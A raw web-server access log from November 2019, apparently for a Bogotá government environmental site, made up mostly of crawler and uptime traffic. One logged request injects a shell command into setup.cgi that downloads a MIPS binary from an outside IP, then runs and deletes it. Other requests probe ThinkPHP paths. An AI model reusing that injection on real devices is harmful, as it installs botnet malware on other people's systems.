66.249.65.250 - - [09/Nov/2019:02:33:45 -0500] "GET /portel_dama/libreria/php/2006/ECOSISTEMAS%20FINAL%20web_mz27/xxxxx%20incendios/sitio/xtras/2.pdf HTTP/1.1" 404 1018
69.162.124.232 - - [09/Nov/2019:02:33:58 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.250 - - [09/Nov/2019:02:34:06 -0500] "GET /BLA/resoluciones/AUTOS%202016/2423.pdf HTTP/1.1" 200 667537
192.99.6.226 - - [09/Nov/2019:02:34:08 -0500] "GET /PruebasSTORM/StormSDA_pruebas/userFiles/user_files/formatos/70.xml/ HTTP/1.1" 404 1015
66.249.65.250 - - [09/Nov/2019:02:34:34 -0500] "GET /BLA/resoluciones/AUTOS%202018/5534.pdf HTTP/1.1" 200 314942
192.99.6.226 - - [09/Nov/2019:02:34:45 -0500] "GET /PruebasSTORM/StormSDA_pruebas/userFiles/user_files/formatos/71.xml/ HTTP/1.1" 404 1015
66.249.65.199 - - [09/Nov/2019:02:34:57 -0500] "GET /POT-2013/Cartografia/09_EEP.pdf HTTP/1.1" 304 -
66.249.65.250 - - [09/Nov/2019:02:35:20 -0500] "GET /BLA/resoluciones/AUTOS%202017/0790.pdf HTTP/1.1" 200 383926
66.249.65.250 - - [09/Nov/2019:02:35:31 -0500] "GET /BLA/resoluciones/AUTOS%202014/1067.pdf HTTP/1.1" 200 932567
192.99.6.226 - - [09/Nov/2019:02:35:33 -0500] "GET /PruebasSTORM/StormSDA_pruebas/userFiles/user_files/formatos/72.xml/ HTTP/1.1" 404 1015
54.36.149.67 - - [09/Nov/2019:02:35:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201001-1050/2002RES1007.tif HTTP/1.1" 200 560072
216.244.66.195 - - [09/Nov/2019:02:35:56 -0500] "GET /BLA/resoluciones/AUTOS%202007/0716.pdf HTTP/1.1" 200 110576
66.249.65.250 - - [09/Nov/2019:02:36:02 -0500] "GET /BLA/resoluciones/AUTOS%202016/2963.pdf HTTP/1.1" 304 -
192.168.175.104 - - [09/Nov/2019:02:36:06 -0500] "GET / HTTP/1.0" 200 9990
192.99.6.226 - - [09/Nov/2019:02:36:08 -0500] "GET /PruebasSTORM/StormSDA_pruebas/userFiles/user_files/formatos/73.xml/ HTTP/1.1" 404 1015
192.168.175.104 - - [09/Nov/2019:02:36:09 -0500] "GET / HTTP/1.1" 200 9990
66.249.65.250 - - [09/Nov/2019:02:36:27 -0500] "GET /BLA/resoluciones/AUTOS%202016/0875.pdf HTTP/1.1" 200 652293
66.249.65.250 - - [09/Nov/2019:02:36:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/1208.pdf HTTP/1.1" 200 129880
192.99.6.226 - - [09/Nov/2019:02:36:47 -0500] "GET /PruebasSTORM/StormSDA_pruebas/userFiles/user_files/formatos/74.xml/ HTTP/1.1" 404 1015
192.99.6.226 - - [09/Nov/2019:02:37:30 -0500] "GET /PruebasSTORM/StormSDA_pruebas/userFiles/user_files/formatos/75.xml/ HTTP/1.1" 404 1015
201.245.192.253 - - [09/Nov/2019:02:37:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 27750
216.244.66.195 - - [09/Nov/2019:02:37:47 -0500] "GET /BLA/resoluciones/AUTOS%202007/0929.pdf HTTP/1.1" 200 76440
66.249.65.197 - - [09/Nov/2019:02:37:48 -0500] "GET /portalsiaccapacitaciones/Listas%20de%20Asistencia%202015/LA.%20HC%2029_07_2015.pdf HTTP/1.1" 200 853932
54.36.150.113 - - [09/Nov/2019:02:38:10 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202005/RES%202005%203001-3050/&sort=size&order=asc HTTP/1.1" 200 12364
192.99.6.226 - - [09/Nov/2019:02:38:16 -0500] "GET /PruebasSTORM/StormSDA_pruebas/userFiles/user_files/formatos/76.xml/ HTTP/1.1" 404 1015
216.244.66.195 - - [09/Nov/2019:02:38:32 -0500] "GET /BLA/resoluciones/AUTOS%202007/0993.pdf HTTP/1.1" 200 25011
192.99.6.226 - - [09/Nov/2019:02:38:41 -0500] "GET /PruebasSTORM/StormSDA_pruebas/userFiles/user_files/formatos/77.xml/ HTTP/1.1" 404 1015
69.162.124.232 - - [09/Nov/2019:02:38:57 -0500] "HEAD / HTTP/1.1" 200 -
192.99.6.226 - - [09/Nov/2019:02:39:20 -0500] "GET /PruebasSTORM/StormSDA_pruebas/userFiles/user_files/formatos/78.xml/ HTTP/1.1" 404 1015
192.99.6.226 - - [09/Nov/2019:02:39:55 -0500] "GET /PruebasSTORM/StormSDA_pruebas/userFiles/user_files/formatos/84.xml/ HTTP/1.1" 404 1015
159.138.155.131 - - [09/Nov/2019:02:40:17 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B2012%2F HTTP/1.1" 200 12073
216.244.66.195 - - [09/Nov/2019:02:40:20 -0500] "GET /BLA/resoluciones/AUTOS%202007/1053.pdf HTTP/1.1" 200 21756
66.249.65.199 - - [09/Nov/2019:02:40:28 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
66.249.65.250 - - [09/Nov/2019:02:40:30 -0500] "GET /BLA/resoluciones/AUTOS%202016/2981.pdf HTTP/1.1" 200 441678
192.99.6.226 - - [09/Nov/2019:02:40:37 -0500] "GET /PruebasSTORM/StormSDA_pruebas/userFiles/user_files/formatos/85.xml/ HTTP/1.1" 404 1015
66.249.65.199 - - [09/Nov/2019:02:40:48 -0500] "GET /portel_dama/libreria/php/2006/ECOSISTEMAS%20FINAL%20web_mz27/x%20restauracion/sitio/55_artic/xtras/13.pdf HTTP/1.1" 404 1019
216.244.66.195 - - [09/Nov/2019:02:40:59 -0500] "GET /BLA/resoluciones/AUTOS%202007/1241.pdf HTTP/1.1" 200 67518
192.168.175.104 - - [09/Nov/2019:02:41:04 -0500] "GET / HTTP/1.0" 200 9990
192.168.175.104 - - [09/Nov/2019:02:41:07 -0500] "GET / HTTP/1.1" 200 9990
192.99.6.226 - - [09/Nov/2019:02:41:10 -0500] "GET /PruebasSTORM/StormSDA_pruebas/userFiles/user_files/formatos/86.xml/ HTTP/1.1" 404 1015
192.99.6.226 - - [09/Nov/2019:02:41:40 -0500] "GET /PruebasSTORM/StormSDA_pruebas/userFiles/user_files/formatos/87.xml/ HTTP/1.1" 404 1015
66.249.65.252 - - [09/Nov/2019:02:42:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1544.pdf HTTP/1.1" 200 224993
216.244.66.195 - - [09/Nov/2019:02:42:12 -0500] "GET /BLA/resoluciones/AUTOS%202007/1398.pdf HTTP/1.1" 200 31062
66.249.65.252 - - [09/Nov/2019:02:42:18 -0500] "GET /resoluciones/AUTOS%202007/3246.pdf HTTP/1.1" 404 1018
192.99.6.226 - - [09/Nov/2019:02:42:30 -0500] "GET /PruebasSTORM/StormSDA_pruebas/userFiles/user_files/formatos/88.xml/ HTTP/1.1" 404 1015
216.244.66.195 - - [09/Nov/2019:02:42:45 -0500] "GET /BLA/resoluciones/AUTOS%202007/1618.pdf HTTP/1.1" 200 97428
192.99.6.226 - - [09/Nov/2019:02:43:08 -0500] "GET /PruebasSTORM/StormSDA_pruebas/userFiles/user_files/formatos/91.xml/ HTTP/1.1" 404 1015
66.249.65.252 - - [09/Nov/2019:02:43:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1790.pdf HTTP/1.1" 200 275797
192.99.6.226 - - [09/Nov/2019:02:43:40 -0500] "GET /PruebasSTORM/StormSDA_pruebas/userFiles/user_files/formatos/97.xml/ HTTP/1.1" 404 1015
69.162.124.232 - - [09/Nov/2019:02:43:57 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [09/Nov/2019:02:44:00 -0500] "GET /BLA/resoluciones/AUTOS%202007/1752.pdf HTTP/1.1" 200 33237
192.99.6.226 - - [09/Nov/2019:02:44:08 -0500] "GET /PruebasSTORM/StormSDA_pruebas/userFiles/user_files/formatos/98.xml/ HTTP/1.1" 404 1015
216.244.66.195 - - [09/Nov/2019:02:44:33 -0500] "GET /BLA/resoluciones/AUTOS%202007/1845.pdf HTTP/1.1" 200 31652
66.249.65.254 - - [09/Nov/2019:02:44:33 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Otros%20Elementos/PARTE%20B/Dise%C3%B1o%20de%20Elementos%20M100-M101.pdf HTTP/1.1" 304 -
192.99.6.226 - - [09/Nov/2019:02:44:40 -0500] "GET /PruebasSTORM/StormSDA_pruebas/userFiles/user_files/formulas/?C=M;O=D/ HTTP/1.1" 200 1503
216.244.66.195 - - [09/Nov/2019:02:45:06 -0500] "GET /BLA/resoluciones/AUTOS%202007/1907.pdf HTTP/1.1" 200 30665
192.99.6.226 - - [09/Nov/2019:02:45:22 -0500] "GET /PruebasSTORM/StormSDA_pruebas/userFiles/user_files/formulas/?C=S;O=D/ HTTP/1.1" 200 1503
46.229.168.150 - - [09/Nov/2019:02:45:35 -0500] "GET /robots.txt HTTP/1.1" 404 1019
46.229.168.153 - - [09/Nov/2019:02:45:35 -0500] "GET /Autoliquidacion/index.php?dir=TR%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%81MITES%2BVERTIMIENTOS%2F&order=desc&sort=size HTTP/1.1" 200 8127
216.244.66.195 - - [09/Nov/2019:02:45:38 -0500] "GET /BLA/resoluciones/AUTOS%202007/1979.pdf HTTP/1.1" 200 40154
192.99.6.226 - - [09/Nov/2019:02:45:51 -0500] "GET /PruebasSTORM/silvicultura2Pruebas/?C=D;O=D/ HTTP/1.1" 200 1231
192.168.175.104 - - [09/Nov/2019:02:46:02 -0500] "GET / HTTP/1.0" 200 9990
192.168.175.104 - - [09/Nov/2019:02:46:05 -0500] "GET / HTTP/1.1" 200 9990
216.244.66.195 - - [09/Nov/2019:02:46:13 -0500] "GET /BLA/resoluciones/AUTOS%202008/0129.pdf HTTP/1.1" 200 102029
192.99.6.226 - - [09/Nov/2019:02:46:41 -0500] "GET /PruebasSTORM/silvicultura2Pruebas/?C=N;O=D/ HTTP/1.1" 200 1231
216.244.66.195 - - [09/Nov/2019:02:46:49 -0500] "GET /BLA/resoluciones/AUTOS%202008/0158.pdf HTTP/1.1" 200 227316
5.255.250.75 - - [09/Nov/2019:02:47:08 -0500] "GET /POT-2013/Cartografia/09_EEP.pdf HTTP/1.1" 200 3326963
192.99.6.226 - - [09/Nov/2019:02:47:11 -0500] "GET /StormSDA/?C=M;O=D/ HTTP/1.1" 200 4405
216.244.66.197 - - [09/Nov/2019:02:47:25 -0500] "GET /robots.txt HTTP/1.1" 404 1019
216.244.66.195 - - [09/Nov/2019:02:47:28 -0500] "GET /BLA/resoluciones/AUTOS%202008/0377.pdf HTTP/1.1" 200 265034
192.99.6.226 - - [09/Nov/2019:02:47:38 -0500] "GET /StormSDA/forms/?C=N;O=D/ HTTP/1.1" 200 3471
192.99.6.226 - - [09/Nov/2019:02:48:18 -0500] "GET /StormSDA/nsjars/?C=N;O=D/ HTTP/1.1" 200 5598
66.249.65.245 - - [09/Nov/2019:02:48:39 -0500] "GET /portel_dama/libreria/pdf/ecosistemas/restauracion/sitio/22_proye/xtras_in/2a.pdf HTTP/1.1" 404 1018
192.99.6.226 - - [09/Nov/2019:02:48:50 -0500] "GET /StormSDA/stormWeb/?C=D;O=D/ HTTP/1.1" 200 1187
69.162.124.232 - - [09/Nov/2019:02:48:57 -0500] "HEAD / HTTP/1.1" 200 -
192.99.6.226 - - [09/Nov/2019:02:49:31 -0500] "GET /StormSDA/stormWeb/?C=M;O=D/ HTTP/1.1" 200 1187
66.249.65.250 - - [09/Nov/2019:02:49:37 -0500] "GET /BLA/resoluciones/AUTOS%202017/0783.pdf HTTP/1.1" 200 294885
66.249.65.250 - - [09/Nov/2019:02:49:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/2528.pdf HTTP/1.1" 200 492354
192.99.6.226 - - [09/Nov/2019:02:50:03 -0500] "GET /StormSDA/stormWeb/?C=N;O=A/ HTTP/1.1" 200 1187
159.138.159.233 - - [09/Nov/2019:02:50:32 -0500] "GET /www.ambientebogota.gov.co/web/intranet/inicio?p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin&p_p_id=58&p_p_lifecycle=0&_58_redirect=%2Fgroup%2Fintranet%2Finicio HTTP/1.1" 404 1018
192.99.6.226 - - [09/Nov/2019:02:50:37 -0500] "GET /StormSDA/stormWeb/?C=S;O=D/ HTTP/1.1" 200 1187
216.244.66.195 - - [09/Nov/2019:02:50:50 -0500] "GET /robots.txt HTTP/1.1" 404 1018
192.168.175.104 - - [09/Nov/2019:02:51:00 -0500] "GET / HTTP/1.0" 200 9990
192.168.175.104 - - [09/Nov/2019:02:51:03 -0500] "GET / HTTP/1.1" 200 9990
192.99.6.226 - - [09/Nov/2019:02:51:10 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/1/?C=S;O=D/ HTTP/1.1" 200 1747
66.249.65.250 - - [09/Nov/2019:02:51:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/3511.pdf HTTP/1.1" 200 301955
192.99.6.226 - - [09/Nov/2019:02:51:42 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/85/?C=M;O=D/ HTTP/1.1" 200 873
46.229.168.163 - - [09/Nov/2019:02:51:58 -0500] "GET /Anexos%20estudio%20Organizacional%20SDA/index.php?dir=ANEXO%2BNo.%2B1-%2BNORMAS%2BLEGALES%2BDE%2BESTRUCTURA%2BY%2BPLANTA%2F&order=desc&sort=size HTTP/1.1" 200 6162
192.99.6.226 - - [09/Nov/2019:02:52:19 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/85/?C=S;O=D/ HTTP/1.1" 200 873
64.44.40.210 - - [09/Nov/2019:02:52:19 -0500] "GET /setup.cgi?next_file=afr.cfg&todo=syscmd&cmd=wget%20http://64.44.40.242/kowai.mips%20-O%20/var/tmp/kowai.mips;%20chmod%20777%20/var/tmp/kowai.mips;%20/var/tmp/kowai.mips;%20rm%20-rf%20/var/tmp/kowai.mips&curpath=/&currentsetting.htm=1 HTTP/1.1" 404 1018
46.229.168.150 - - [09/Nov/2019:02:52:37 -0500] "GET /Autoliquidacion/index.php?dir=Fauna%2BSilvestre%2F&order=desc&sort=date HTTP/1.1" 200 6576
66.249.65.252 - - [09/Nov/2019:02:52:43 -0500] "GET /BLA/resoluciones/AUTOS%202014/6718.pdf HTTP/1.1" 200 2423444
192.99.6.226 - - [09/Nov/2019:02:52:47 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/86/?C=N;O=D/ HTTP/1.1" 200 873
66.249.65.250 - - [09/Nov/2019:02:52:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/1446.pdf HTTP/1.1" 304 -
192.99.6.226 - - [09/Nov/2019:02:53:19 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/88/?C=D;O=A/ HTTP/1.1" 200 873
66.249.65.250 - - [09/Nov/2019:02:53:35 -0500] "GET /BLA/resoluciones/AUTOS%202014/5891.pdf HTTP/1.1" 200 310693
192.99.6.226 - - [09/Nov/2019:02:53:47 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/88/?C=M;O=A/ HTTP/1.1" 200 873
69.162.124.232 - - [09/Nov/2019:02:53:57 -0500] "HEAD / HTTP/1.1" 200 -
192.99.6.226 - - [09/Nov/2019:02:54:12 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/88/?C=N;O=D/ HTTP/1.1" 200 873
66.249.65.250 - - [09/Nov/2019:02:54:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6072.pdf HTTP/1.1" 200 562340
66.249.65.252 - - [09/Nov/2019:02:54:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0845.pdf HTTP/1.1" 304 -
66.249.65.252 - - [09/Nov/2019:02:54:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%202701%20AL%202800/RESOLUCION%202718%20%20DE%202007.pdf HTTP/1.1" 200 552483
192.99.6.226 - - [09/Nov/2019:02:54:52 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/88/?C=S;O=A/ HTTP/1.1" 200 873
192.99.6.226 - - [09/Nov/2019:02:55:22 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/93/?C=D;O=A/ HTTP/1.1" 200 873
66.249.65.252 - - [09/Nov/2019:02:55:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%201401%20AL%201500/RESOLUCION%201441%20DE%202007.pdf HTTP/1.1" 200 283821
54.36.150.106 - - [09/Nov/2019:02:55:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201501-1550/20021539.tif HTTP/1.1" 200 174792
186.84.22.176 - - [09/Nov/2019:02:55:47 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.84.22.176 - - [09/Nov/2019:02:55:47 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.84.22.176 - - [09/Nov/2019:02:55:47 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
192.99.6.226 - - [09/Nov/2019:02:55:49 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/93/?C=M;O=A/ HTTP/1.1" 200 873
186.84.22.176 - - [09/Nov/2019:02:55:54 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 304 -
186.84.22.176 - - [09/Nov/2019:02:55:54 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 304 -
186.84.22.176 - - [09/Nov/2019:02:55:54 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 304 -
192.168.175.104 - - [09/Nov/2019:02:55:58 -0500] "GET / HTTP/1.0" 200 9990
192.168.175.104 - - [09/Nov/2019:02:56:01 -0500] "GET / HTTP/1.1" 200 9990
54.36.150.0 - - [09/Nov/2019:02:56:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201801-1850/20021840.tif HTTP/1.1" 200 74214
192.99.6.226 - - [09/Nov/2019:02:56:23 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/93/?C=N;O=D/ HTTP/1.1" 200 873
66.249.65.254 - - [09/Nov/2019:02:56:35 -0500] "GET /BLA/resoluciones/Autos%202008/2354.pdf HTTP/1.1" 200 276877
66.249.65.250 - - [09/Nov/2019:02:56:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/2525.pdf HTTP/1.1" 200 4842671
54.36.148.157 - - [09/Nov/2019:02:56:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20101-150/2002RES144.tif HTTP/1.1" 200 39850
54.36.150.14 - - [09/Nov/2019:02:56:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%201001-1050/00001026.tif HTTP/1.1" 200 116678
192.99.6.226 - - [09/Nov/2019:02:56:55 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/93/?C=S;O=A/ HTTP/1.1" 200 873
192.99.6.226 - - [09/Nov/2019:02:57:21 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/94/?C=D;O=A/ HTTP/1.1" 200 873
66.249.65.252 - - [09/Nov/2019:02:57:25 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Otros%20Elementos/PARTE%20B/Dise%C3%B1o%20de%20Elementos%20M100-M101.pdf HTTP/1.1" 200 282657
66.249.65.254 - - [09/Nov/2019:02:57:31 -0500] "GET /BLA/resoluciones/AUTOS%202012/1888.pdf HTTP/1.1" 200 275554
54.36.148.117 - - [09/Nov/2019:02:57:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%20901-950/00000926.tif HTTP/1.1" 200 39338
192.99.6.226 - - [09/Nov/2019:02:57:47 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/94/?C=M;O=A/ HTTP/1.1" 200 873
66.249.65.252 - - [09/Nov/2019:02:57:59 -0500] "GET /BLA/resoluciones/AUTOS%202019/1108.pdf HTTP/1.1" 200 8787484
192.99.6.226 - - [09/Nov/2019:02:58:17 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/94/?C=N;O=D/ HTTP/1.1" 200 873
66.249.65.252 - - [09/Nov/2019:02:58:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0126.pdf HTTP/1.1" 200 245135
66.249.65.232 - - [09/Nov/2019:02:58:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6666.pdf HTTP/1.1" 200 663958
192.99.6.226 - - [09/Nov/2019:02:58:51 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/94/?C=S;O=A/ HTTP/1.1" 200 873
69.162.124.232 - - [09/Nov/2019:02:58:57 -0500] "HEAD / HTTP/1.1" 200 -
192.99.6.226 - - [09/Nov/2019:02:59:18 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/95/?C=D;O=A/ HTTP/1.1" 200 873
66.249.65.250 - - [09/Nov/2019:02:59:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1260.pdf HTTP/1.1" 200 351553
66.249.65.250 - - [09/Nov/2019:02:59:33 -0500] "GET /resoluciones/RESOLUCIONES%202010/0128.pdf HTTP/1.1" 404 1018
66.249.65.250 - - [09/Nov/2019:02:59:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1968.pdf HTTP/1.1" 200 501150
192.99.6.226 - - [09/Nov/2019:02:59:54 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/95/?C=M;O=A/ HTTP/1.1" 200 873
66.249.65.250 - - [09/Nov/2019:03:00:15 -0500] "GET /BLA/resoluciones/AUTOS%202013/2418.pdf HTTP/1.1" 200 1817744
66.249.65.250 - - [09/Nov/2019:03:00:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/3692.pdf HTTP/1.1" 200 475046
66.249.65.252 - - [09/Nov/2019:03:00:24 -0500] "GET /BLA/resoluciones/AUTOS%202012/2155.pdf HTTP/1.1" 200 375919
192.99.6.226 - - [09/Nov/2019:03:00:30 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/95/?C=S;O=A/ HTTP/1.1" 200 873
66.249.65.252 - - [09/Nov/2019:03:00:31 -0500] "GET /resoluciones/RESOLUCIONES%202008/1740.pdf HTTP/1.1" 404 1018
66.249.65.250 - - [09/Nov/2019:03:00:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/0849.pdf HTTP/1.1" 200 793374
192.99.6.226 - - [09/Nov/2019:03:00:55 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/96/?C=D;O=D/ HTTP/1.1" 200 873
192.168.175.104 - - [09/Nov/2019:03:00:57 -0500] "GET / HTTP/1.0" 200 9990
192.168.175.104 - - [09/Nov/2019:03:00:59 -0500] "GET / HTTP/1.1" 200 9990
159.138.156.96 - - [09/Nov/2019:03:01:01 -0500] "GET /BLA/resoluciones HTTP/1.1" 301 311
159.138.150.42 - - [09/Nov/2019:03:01:01 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 11866
66.249.65.250 - - [09/Nov/2019:03:01:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/3493.pdf HTTP/1.1" 200 507037
66.249.65.250 - - [09/Nov/2019:03:01:11 -0500] "GET /BLA/resoluciones/AUTOS%202012/0805.pdf HTTP/1.1" 200 425750
66.249.65.250 - - [09/Nov/2019:03:01:19 -0500] "GET /BLA/resoluciones/AUTOS%202012/0877.pdf HTTP/1.1" 200 522441
192.99.6.226 - - [09/Nov/2019:03:01:24 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/96/?C=N;O=D/ HTTP/1.1" 200 873
66.249.65.250 - - [09/Nov/2019:03:01:28 -0500] "GET /BLA/resoluciones/AUTOS%202012/2329.pdf HTTP/1.1" 200 1037609
66.249.65.250 - - [09/Nov/2019:03:01:38 -0500] "GET /BLA/resoluciones/AUTOS%202015/1410.pdf HTTP/1.1" 200 675239
192.99.6.226 - - [09/Nov/2019:03:01:44 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/formatos/?C=D;O=D/ HTTP/1.1" 200 1514
192.99.6.226 - - [09/Nov/2019:03:02:08 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/formatos/?C=M;O=D/ HTTP/1.1" 200 1514
66.249.65.250 - - [09/Nov/2019:03:02:11 -0500] "GET /resoluciones/RESOLUCIONES%202009/8244.pdf HTTP/1.1" 404 1018
66.249.65.252 - - [09/Nov/2019:03:02:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/3099.pdf HTTP/1.1" 200 871338
66.249.65.250 - - [09/Nov/2019:03:02:35 -0500] "GET /BLA/resoluciones/AUTOS%202014/0999.pdf HTTP/1.1" 200 678459
192.99.6.226 - - [09/Nov/2019:03:02:38 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/formatos/?C=N;O=A/ HTTP/1.1" 200 1514
66.249.65.250 - - [09/Nov/2019:03:02:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0641.pdf HTTP/1.1" 200 348679
5.255.250.154 - - [09/Nov/2019:03:02:47 -0500] "GET /robots.txt HTTP/1.1" 404 1019
5.255.250.154 - - [09/Nov/2019:03:02:51 -0500] "GET /PruebasSTORM/StormSDA_pruebas/userFiles/user_files/listas/188.xml HTTP/1.1" 200 467
106.52.186.37 - - [09/Nov/2019:03:03:07 -0500] "GET /TP/public/index.php HTTP/1.1" 404 1018
106.52.186.37 - - [09/Nov/2019:03:03:08 -0500] "GET /TP/index.php HTTP/1.1" 404 1018
192.99.6.226 - - [09/Nov/2019:03:03:08 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/formatos/?C=S;O=D/ HTTP/1.1" 200 1514
106.52.186.37 - - [09/Nov/2019:03:03:08 -0500] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 1018
106.52.186.37 - - [09/Nov/2019:03:03:09 -0500] "GET /html/public/index.php HTTP/1.1" 404 1018
106.52.186.37 - - [09/Nov/2019:03:03:09 -0500] "GET /public/index.php HTTP/1.1" 404 1018
106.52.186.37 - - [09/Nov/2019:03:03:10 -0500] "GET /TP/html/public/index.php HTTP/1.1" 404 1018
106.52.186.37 - - [09/Nov/2019:03:03:12 -0500] "GET /elrekt.php HTTP/1.1" 404 1018
106.52.186.37 - - [09/Nov/2019:03:03:12 -0500] "GET /index.php HTTP/1.1" 404 1018
106.52.186.37 - - [09/Nov/2019:03:03:16 -0500] "GET / HTTP/1.1" 200 9990
